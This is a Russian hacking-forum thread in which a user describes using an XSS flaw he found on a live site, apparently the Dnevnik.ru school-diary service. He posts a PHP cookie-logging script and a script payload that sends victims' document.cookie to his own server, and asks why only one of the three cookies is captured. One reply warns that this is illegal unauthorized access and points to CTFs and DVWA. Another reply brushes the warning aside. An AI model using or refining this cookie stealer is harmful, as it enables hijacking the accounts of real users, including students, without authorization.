• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фазинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Проблема Проблема с XSS

Tayrus

Grey Team
13.04.2017
273
383
#1
Нашел на одном сайте XSS, решил сделать куки стилер создал файл
Для просмотра контента необходимо: Войти или зарегистрироваться

в него закинул такой код
PHP:
<?php
$cookie = $_GET['cookie'];
$log = fopen("xssed.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
Вставляю в уязвимый параметр:
<ScRiPt>window.location = '
Для просмотра контента необходимо: Войти или зарегистрироваться
' + document.cookie;</ScRiPt>
На сайте три печеньки
DnevnikAuth_a
_ym_uid
spauth
У меня записуется только _ym_uid
В чем проблема?
Хостинг 000webhost (бесплатный)
 

z3r0c10wn

Well-known member
04.09.2017
105
204
#2
Данная группа печенек обрабатывается в системах Электронных Дневников. И зарегистрирована на Дневник.ру.
Вы пытаетесь получить креды пользователей системы Электронного Дневника?
 

z3r0c10wn

Well-known member
04.09.2017
105
204
#4
В нашей стране в плане bug bounty все достаточно сложно, поэтому рекомендую вам отказаться от вашей затеи.
Ваши действия могут быть обоснованными только если вы:
1) Имеете договор с Дневник.ру на пентест их продукат + подписанный NDA.
2) Работаете в компании Дневник.ру и в ваши служебные полномочия входит тестирование на уязвимости данного продукта.
3) Дневник.ру имеют открытую bug bounty программу.

И во всех этих случаях вам не стоит в открытую задавать такие вопросы на форумах.

Во всех остальных случаях вам могу быть представлены обвинения по статьям 272 ук РФ, а так же возможно в последствии припишут 273 ук РФ, как это у нас частенько бывает.
+ своими вопросами и постами а так же проиндексированными темами в поисковиках вы уже слили в СОРМ метаданные которые могут вас идентифицировать.


Настоятельно вам рекомендую не делать то, что вы делаете. А для обучения есть открытые CTF от Pentestit а так же dvwa
 
Последнее редактирование:

nikos

Well-known member
25.12.2016
462
143
#5
В нашей стране в плане bug bounty все достаточно сложно, поэтому рекомендую вам отказаться от вашей затеи.
Ваши действия могут быть обоснованными только если вы:
1) Имеете договор с Дневник.ру на пентест их продукат + подписанный NDA.
2) Работаете в компании Дневник.ру и в ваши служебные полномочия входит тестирование на уязвимости данного продукта.
3) Дневник.ру имеют открытую bug bounty программу.

И во всех этих случаях вам не стоит в открытую задавать такие вопросы на форумах.

Во всех остальных случаях вам могу быть представлены обвинения по статьям 272 ук РФ, а так же возможно в последствии припишут 273 ук РФ, как это у нас частенько бывает.
+ своими вопросами и постами а так же проиндексированными темами в поисковиках вы уже слили в СОРМ метаданные которые могут вас идентифицировать.


Настоятельно вам рекомендую не делать то, что вы делаете. А для обучения есть открытые CTF от Pentestit а так же dvwa
А что такого пусть парень учится)
 
Вверх Снизу